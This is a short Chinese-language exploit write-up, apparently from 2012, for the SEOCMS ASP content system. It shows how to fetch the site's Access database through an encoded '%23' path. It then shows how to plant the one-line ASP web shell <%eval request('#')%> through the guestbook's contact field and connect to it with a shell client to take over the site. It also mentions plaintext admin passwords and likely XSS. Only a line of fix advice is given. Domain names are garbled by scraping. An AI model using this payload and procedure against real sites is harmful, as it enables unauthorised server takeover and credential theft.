源码下载地址:http://down.chinaz测试数据/soft/32610.htm 我也不知道这套站用的人多不多. 目测更新的版本也挺多的哈哈。 首先我大概看了一下网站的编辑器,然后到数据库. 看到数据库是asp后缀的。 然后就访问http://HdhCmsTest2cto测试数据 /Data/#xk.mdb.asp 这样访问他返回一个错误http 500这样是不能下载的. 绕过的方法就是把#转成URL格式#就变成了%23 访问http:/HdhCmsTest2cto测试数据 /Data/%23xk.mdb.asp 我就想能不能直接写一句话进去,这样就不用下载这个数据找管理工具打开看管理员的账号密码(账号密码是明文的,真奇葩).然后上后台去上传的来搞shell了. 于是我又返回到首页去,看到了有个留言板.. http://HdhCmsTest2cto测试数据 /zxly.asp 根据经验,一般asp留言板的都会存access数据库里。 看了一下guestbook字段 果然有。 利用方法是:到http://HdhCmsTest2cto测试数据 /WriteBook.asp那留言,联系人填<%eval request([#])%> 其他随便填。 然后菜刀连接http://HdhCmsTest2cto测试数据 /data/%23xk.mdb.asp 密码# 修复建议, 把asp改成mdb后缀. 留言板过滤各种xx. 我估计xss 漏洞 也有0.0貌似没过滤.写个csrf挺好玩的.等会去试试. 没啥亮点仅仅做下记录保存.. 刚测试的确有xss… Author:小乖&Mix0xrn From:http://HdhCmsTestx-fei.org & http://team.f4ck.net & http://HdhCmsTesth4x0er测试数据 Email:hx0c4k@gmail测试数据 Data:2012-07-18
查看更多关于SEOCMS留言板插马漏洞及修复建议 - 网站安全 - 自的详细内容...